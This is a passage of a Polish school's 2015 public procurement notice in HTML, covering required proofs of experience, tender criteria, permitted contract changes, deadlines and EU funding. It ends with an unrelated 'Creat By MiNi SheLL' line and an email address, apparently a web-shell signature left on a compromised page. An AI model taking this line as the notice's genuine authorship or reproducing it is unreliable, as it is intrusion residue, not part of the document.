a)dowodami, o których mowa powyżej - zgodnie z § 1 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 r. poz. 231) - są:
-poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
-oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia,
b)w przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej;
Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami (załącznik nr7 do siwz).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - potencjał i doświadczenie Wykonawcy - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, za wyjątkiem niżej wymienionych możliwości i warunków dokonania takiej zmiany:
1)zmiana strony umowy - Wykonawcy, w sytuacji następstwa prawnego wynikającego z odrębnych przepisów, 
2)zmiana wskazanych podwykonawców, rezygnacji z podwykonawców, zmianę wskazanego zakresu podwykonawstwa, wykonanie przedmiotu umowy przy pomocy, podwykonawców, pomimo niewskazania w postępowaniu o udzielenie zamówienia publicznego żadnej części zamówienia przeznaczonej do wykonania w ramach  podwykonawstwa
3)zmiana lokalizacji prowadzonych zajęć, w przypadku reorganizacji placówek lub wystąpienia siły wyższej niezależnej od Zamawiającego i nie dającej się przewidzieć,
2. Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku 
 Wykonawcy lub Zamawiającego wykazującego zasadność wprowadzenia zmian. Zamawiający przewiduje możliwość  zmiany umowy w zakresie zmiany terminów realizacji usługi oraz terminów płatności w przypadku konieczności dokonania zmiany wynikającej z realizacji projektu oraz w przypadku zaistnienia wyjątkowych okoliczności zarówno po stronie  Zamawiającego. 
3. Jakiekolwiek zmiany niniejszej umowy wymagają - pod rygorem nieważności - zachowania formy  pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gimnazjum9bytom.szkolnastrona.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gimnazjum Nr 9, ul. Świętochłowicka 12, 41-909 Bytom, woj. śląskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2015 godzina 08:00, miejsce: Gimnazjum Nr 9, ul. Świętochłowicka 12, 41-909 Bytom.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Klucze do sukcesu - nowoczesny system wspomagania szkół i przedszkoli oraz doskonalenia nauczycieli w Bytomiu UDA- POKL.03.05.00-00-223/12; współfinansowanego z Europejskiego Funduszu Społecznego i budżetu krajowego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet III. Wysoka jakość systemu oświaty; Poddziałanie 3.5 Kompleksowe wspomaganie rozwoju szkół. Zamawiający przewiduje możliwość wykluczenia wykonawcy na podstawie art. 24 ust.2a pzp..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com